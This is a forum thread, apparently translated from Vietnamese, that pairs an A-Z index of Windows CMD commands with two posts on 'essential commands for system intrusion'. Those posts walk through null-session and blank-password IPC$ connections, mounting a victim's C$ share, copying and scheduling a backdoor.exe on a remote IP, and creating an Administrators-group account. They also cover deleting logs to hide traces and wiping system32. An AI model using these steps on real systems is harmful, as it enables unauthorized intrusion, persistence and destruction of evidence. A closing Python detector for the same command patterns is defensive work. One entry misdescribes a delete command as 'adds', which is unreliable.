
An A-Z Index of the Windows CMD command line

Admin on Fri Oct 21, 2011 4:24 am

ADDUSERS Add or list users to/from a CSV file


ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
ATTRIB Change file attributes
b
BCDBOOT Create or repair a system partition
BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info
c
CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
CMDKEY Manage stored usernames/passwords
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSCcmd Client-side caching (Offline Files)
CSVDE Import or Export Active Directory data
d
DATE Display or set the date
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DISKPART Disk Administration
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSACLs Active Directory ACLs
DSAdd Add items to active directory (user group computer)
DSGet View items in active directory (user group computer)
DSQuery Search for items in active directory (user group computer)
DSMod Modify items in active directory (user group computer)
DSMove Move an Active directory Object
DSRM Remove items from Active Directory
e
ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EVENTCREATE Add a message to the Windows event log
EXIT Quit the current script/routine and set an errorlevel
EXPAND Uncompress files
EXTRACT Uncompress CAB files
f
FC Compare two files
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR /F Loop command: against a set of files
FOR /F Loop command: against the results of another command
FOR Loop command: all options Files, Directory, List
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations
g
GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line
GPUPDATE Update Group Policy settings
h
HELP Online Help
i
iCACLS Change file and folder permissions
IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP
k
KILL Remove a program from memory
l
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer
LOGMAN Manage Performance Monitor
LOGOFF Log a user off
LOGTIME Log the date and time in a file
m
MAPISEND Send email from the command line
MBSAcli Baseline Security Analyzer.
MEM Display memory usage
MD Create new folders
MKLINK Create a symbolic link (linkd)
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MV Copy in-use files
n
NET Manage network resources
NETDOM Domain Manager
NETSH Configure Network Interfaces, Windows Firewall & Remote access
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights
o
OPENFILES Query or display open files
p
PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
POWERCFG Configure power settings
PRINT Print a text file
PRINTBRM Print queue Backup/Recovery
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory
q
QGREP Search file(s) for lines that match a given pattern.
r
RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Registry: Read, Set, Export, Delete keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files
REPLACE Replace or update one file with another
RD Delete folder(s)
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUN Start | RUN commands
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)
s
SC Service Control
SCHTASKS Schedule a command to run at a specific time
SCLIST Display NT Services
SET Display, set, or remove environment variables
SETLOCAL Control the visibility of environment variables
SETX Set environment variables permanently
SFC System File Checker
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SLMGR Software Licensing Management (Vista/2008)
SOON Schedule a command to run in the near future
SORT Sort input
START Start a program or command in a separate window
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration
t
TASKLIST List running applications and services
TASKKILL Remove a running process from memory
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TLIST Task list with full path
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TSSHUTDN Remotely shut down or reboot a terminal server
TYPE Display the contents of a text file
TypePerf Write performance data to a log file
u
USRSTAT List domain usernames and last login
v
VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label
w
WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WINRM Windows Remote Management
WINRS Windows Remote Shell
WMIC WMI Commands
WUAUCLT Windows Update
x
XCACLS Change file and folder permissions
XCOPY Copy files and folders
:: Comment / Remark

Admin
Admin on Fri Oct 21, 2011 4:28 am

Code:

ECHO OFF
:: CMD will not display any of the commands executed below.
ECHO QuanTriMang: Demo tao file BAT
:: Print a line of text
IPCONFIG /ALL
:: Display network information in the command prompt window
PAUSE
:: Pause execution of the remaining commands so the user can read the important information.
PING www.google.com
:: Ping Google.com
ECHO Toan bo thong tin ve Google Ping duoc.
:: Print a line of text
PAUSE
:: Lets the user view the result. Because this is the last command, the command window
:: closes after any key is pressed.

Essential commands for system intrusion (Windows)
Admin on Sun Nov 06, 2011 2:38 am

Essential commands for system intrusion (Windows), Part I: The NET command
Within the scope of this article I only introduce the syntax of each command briefly and
practically. If you want to learn more, just type ==> the command name followed by /help
(e.g. to learn more about net view, type ==> net view /help). I also do not go deep into
intrusion work itself. This article is just a summary of the necessary commands, because
if you don't use them for a long time you can easily forget them.
Chapter I: The NET command

NET is an external command (that is, not built in), but it ships with almost every
Microsoft Windows operating system, and it is a very necessary and important command for
breaking into a system. NET is not used alone; it is combined with other methods to form
a specific command. Because of its importance I have given it its own chapter.

1/ NET VIEW: lists the resources currently shared by any given machine; with no
parameters it displays the resources of the local machine.

Syntax:
NET VIEW \\computername
or
NET VIEW \\ip
(for a machine on the network, given by name or by IP address)

Example:
NET VIEW \\127.0.0.1

2/ NET USE: connects the machine you are working on to a shared resource on the network
(here the network can mean machines on the local network or machines reached through a
fixed IP address) with a certain level of privilege. Note that this command only works
when you hold some user rights on the specific resource on each machine you want to
access (that is, when you know a username and password on the machine you want to
connect to; if you do not, one option is to connect a null session to that machine).
Another way is to guess or brute-force the password, or to use tools, but I do not cover
that within the scope of this article.

Syntax:
NET USE \\IP\SHARENAME PASSWORD /USER:USERNAME
(connects to a given resource when the username and password are known)
NET USE \\IP\IPC$ /USER:Administrator
(when the Admin password has not been set)
NET USE \\IP\IPC$
(connects a null session to the default resource ==> the chance of success is very low)
NET USE .. /DELETE
(disconnects the user's machine from the machine hosting the resource)

Example: you are on machine A and want to connect to resources on machine B, whose IP
address is 120.1.1.5. Machine B has 2 shared resources, data1 and data2; data1 is for
user1 with password pass1 and data2 is for user2 with password pass2. There is also
machine B's default resource, IPC$, which is normally reserved for the highest privilege,
admin; if the administrator account unfortunately has no password protecting it, then
once you connect to IPC$ you can access every default and non-default shared resource on
machine B.

- connect to data1 and map the resource to drive x: ==> NET USE x: \\120.1.1.5\data1 pass1 /USER:user1

- connect to the default resource when the admin has not set a password:

Step 1 ==> NET USE \\120.1.1.5\IPC$ /USER:administrator (continue only once this
connection succeeds)

Step 1 ==> NET USE \\120.1.1.5\IPC$ (connects a null session)

Step 2 ==> NET USE z: \\120.1.1.5\data2 (maps data2 to drive z: for convenient access;
note that I do not need to add the password and username as in the previous example,
because once the IPC$ connection succeeds they are not needed)

Step 2 ==> NET USE y: \\120.1.1.5\C$ (accesses the victim's c: drive, usually a default
share, and maps it to y: on the local machine; from there you can copy anything you want
to the victim machine)

Note: if the connection in either step 1 succeeds, you can run the other commands
against the victim machine without any difficulty, because that connection is the key to
the door. If NET USE succeeds, you effectively have any machine in your hands.

3/ NET USER: creates/deletes user accounts (see /HELP for more), or lists the accounts
when given no parameters.

Syntax:
NET USER username password /ADD
(creates a user with the given username and password)
NET USER username /DELETE
(deletes the user named username)

Example:
NET USER L0ng3ta passw /ADD
(adds a user named L0ng3ta with the password passw to the system; quoting is not
required except where there are special characters)
NET USER L0ng3ta /DELETE
(deletes the user named L0ng3ta)

4/ NET GROUP: adds/removes a user in a group, or lists the groups (when given no parameters)
Syntax:
NET GROUP groupname username /ADD
(adds the user named username to the group named groupname)
NET LOCALGROUP groupname username /ADD
(adds the user named username to the local group named groupname)
NET GROUP groupname username /DELETE
(adds the user named username to the group named groupname)
NET LOCALGROUP groupname username /DELETE
(removes the user named username from the local group named groupname)

Example:
NET GROUP Administrators L0ng3ta /ADD
(adds the user L0ng3ta to the admin group)

5/ NET START/STOP service name: starts or stops a service of the Windows system
(usually used locally)

Example:
NET START|STOP Task Scheduler (starts/stops the system's Task Scheduler service; see also
the SC command)

6/ NET TIME: shows the time of a machine on the network

Syntax:
NET TIME \\IP
(shows the time of the machine with the given IP address)

Example:
NET TIME \\120.1.1.5

7/ NET SHARE: used to share resources (usually used locally)

Syntax:
NET SHARE sharename=path
(path here can be a drive, or an absolute path to a folder, a printer, etc.)

Example:
NET SHARE DATA=C:\ /UNLIMITED
(shares drive c: under the name data with unlimited access)
---
Which command do I use to see the IP address of a website?

Finding it exactly involves more issues. The simplest way is to use the ping command,
e.g. ping www.vnn.vn
---
How do I find my own IP on the net?

Use the command ipconfig /all

or use these websites

http://www.ip2location.com/
or
http://whatismyipaddress.com/

If you want to see a satellite map too, go here

http://www.ip-adress.com/
Type your IP in and click Big IP satellite picture (click here)

Addendum:

I recently wrote this page, which uses the ip-to-country.com database to determine which
country an IP address belongs to; it is quite interesting.

http://sgstars.tripod.com/cgi-bin/ip...pl?203.162.0.1
(remember to change the IP to the one you want to look up)
The next version will be upgraded to detect your IP and country automatically
-------
How can I find out the IP of the person chatting with me on YM?
Go to Google and type the keywords: Tìm + IP + YM and you will get loads of results.

--------------

Essential commands used in intrusion (Windows), Part II

You can't always work through a graphical interface on the machine you need to operate
on (for example, when you are doing something shady there is no Windows Explorer for you
to use to work with files), so the following commands, though simple, are quite
important in what you do. If you want to break into some machine and do not know the
commands below by heart, I advise you to quit the trade.

1/ COPY: an internal command used to copy files (once you have broken in you will of
course want to leave something behind, and this is the command you use)

Syntax:
COPY path1\filename1 path2
(copies the file filename1 at path1 to path2)
+Note: by "path" here I mean something that can be a drive, a folder, or even a network
resource address (provided you have connected to it)

Example:
==>COPY c:\abc.txt d:\
(copies the file abc.txt from c: to drive d:)
==>COPY c:\backdoor.exe \\203.162.45.2\c$
(copies the backdoor file from drive C of your machine to drive C of the IP address 203.162.45.2)
Note: you can use wildcard characters such as * or ? in file names
==>Copy c:\*.doc d:\ (copies all files with the .doc extension to d:)
2/ DEL: an internal command used to delete files (used to erase a stranger's footprints)

Syntax:
DEL path\filename
(deletes the file named filename at path)
Example:
==>DEL c:\windows\*.log
(deletes all .log files on drive C: in the windows folder)
Extended: DEL \\203.162.45.2\Admin$\*.log

3/ MD: an internal command used to create a folder

Syntax:
MD path\tenthumuc

Example:
==>MD c:\windows\temp1
(creates the folder temp1 inside the windows folder on c:)
Extended:
==>MD \\203.162.45.2\Admin$\temp1

4/ RD or RMDIR (delete a folder)

Syntax:
RD /S /Q path\tenthumuc
(with /S, all files and subfolders inside the folder being deleted are removed too; /Q
deletes without asking for confirmation)

Example:
==>RD /S /Q c:\windows\system32
(deletes the system32 folder and everything inside system32)

5/ AT: schedules a program to start by itself at a set time (type AT /HELP to learn more)

Syntax:
AT \\IP time /INTERACTIVE command

Example:
==>AT \\203.162.45.2 2:30AM /INTERACTIVE c:\backdoor.exe
At exactly 2:30 the machine with the IP address \\203.162.45.2 will launch the program
backdoor.exe from C:

Note: AT only works when the task schedule service is running (see the NET START command
in Part 1, or the SC command below, for how to start a service). If you want the program
to start right away without waiting, check the system time at the given IP address with
NET TIME (in Part 1) and make sure the time you schedule for the program is later than
the system time by at least 1 minute.

6/ SC: starts or stops a service on a given machine

Syntax:
SC \\IP start/stop/pause service

Example:
==>SC \\203.162.45.2 start Schedule
(starts the Schedule service on the machine with IP 203.162.45.2)

7/ START: launches a program on the local machine

Syntax:
START program name

Example: (run notepad from the command line)

==>START notepad
or
==>START notepad.exe

8/ TASKLIST (lists the programs running as processes and their IDs).
Learn more by typing TASKLIST /?

9/ TASKKILL (kills a process; see more with TASKKILL /?)

Syntax:
TASKKILL /PID ID
(kills the running program by ID)
or
TASKKILL /F /IM program name
(kills the program with that name running as a process)

Example: if TASKLIST shows notepad.exe with the ID 644, then to kill it type:
==>TASKKILL /PID 644
or
==>TASKKILL /F /IM notepad.exe

10/ REG: (create, delete, restore and view registry values on the local machine or over
a network)

Syntax:
Reg Operation
where Operation is one of the operations Add, Query, Delete, Copy, Save, Load, Unload,
Restore, ... (for more detail type Reg Add /?)

Example: to unlock registry editing on the computer named ABC, type the following:

REG add \\ABC\HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

Those are the very basic commands you need to know well if you want to take your first
steps in the field of intrusion. These commands are not everything, since there are many,
many more commands and programs, but they are the most essential ones. This article is
only meant as a summary, because after a long time without using them we forget. I hope
the article is useful to you and helps you consolidate some basic knowledge.
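
A defender's view of the commands listed in the posts above, as an added example that is not part of the original thread: a small Python matcher that flags those command-line patterns (IPC$ and admin-share connections, writes to admin shares, remote AT and SC, account creation followed by an Administrators-group add) in process-creation logs. The rule names, hosts, accounts and log tuples are constructed for illustration, and the input is assumed to be command lines collected by process-creation auditing (Security event 4688 with command-line logging, or Sysmon event 1).

```python
import re

UNC = r"\\\\[^\\\s]+"          # regex for \\host or \\ip
NET = r"\bnet1?(?:\.exe)?\s+"  # net.exe or net1.exe

# Rule names are labels made up for this example, not a vendor rule set.
RULES = [
    ("ipc_or_admin_share_connect", rf"{NET}use\b.*{UNC}\\(?:ipc|admin|[a-z])\$"),
    ("local_account_created", rf"{NET}user\s+(?P<acct>[^\s/]\S*)\s.*?/add\b"),
    ("added_to_admin_group",
     rf'{NET}(?:local)?group\s+"?administrators"?\s+(?P<acct>[^\s/]\S*)\s.*?/add\b'),
    ("remote_at_job", rf"\bat(?:\.exe)?\s+{UNC}\s"),
    ("remote_service_control", rf"\bsc(?:\.exe)?\s+{UNC}\s+(?:start|stop|pause)\b"),
    ("write_to_admin_share",
     rf"\b(?:copy|xcopy|robocopy|md|mkdir)\b.*{UNC}\\(?:admin|[a-z])\$"),
    ("log_deletion", r"\bdel\b.*\*\.log\b"),
    ("remote_registry_write", rf"\breg(?:\.exe)?\s+add\s+{UNC}\\"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]


def scan(events):
    """events: iterable of (host, user, cmdline); returns (host, user, rule) findings."""
    created = set()  # (host, account) pairs seen in "net user <acct> ... /add"
    findings = []
    for host, user, cmdline in events:
        for name, rx in COMPILED:
            m = rx.search(cmdline)
            if not m:
                continue
            acct = (m.groupdict().get("acct") or "").lower()
            if name == "local_account_created":
                created.add((host, acct))
            elif name == "added_to_admin_group" and (host, acct) in created:
                # Same host created this account earlier: escalate the finding.
                name = "new_account_promoted_to_admin"
            findings.append((host, user, name))
    return findings


# Constructed sample command lines (192.0.2.10 is a documentation address).
SAMPLE = [
    ("WS01", "alice", r"net use x: \\192.0.2.10\data1 /user:user1"),  # plain share: no hit
    ("WS01", "alice", r"net use \\192.0.2.10\IPC$ /user:administrator"),
    ("WS01", "alice", r"cmd.exe /c copy c:\temp\tool.exe \\192.0.2.10\c$"),
    ("WS01", "alice", r"at \\192.0.2.10 2:30AM /interactive c:\tool.exe"),
    ("SRV02", "SYSTEM", r"net user tmpacct Passw0rd /add"),
    ("SRV02", "SYSTEM", r"net localgroup Administrators tmpacct /add"),
    ("SRV02", "bob", r"tasklist"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

COPY, DEL, MD and RD are cmd.exe built-ins, so they show up in process-creation logs only when passed on a cmd.exe command line (as in the third sample); on the target side, file-share access auditing (events 5140 and 5145) covers the admin-share writes instead.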
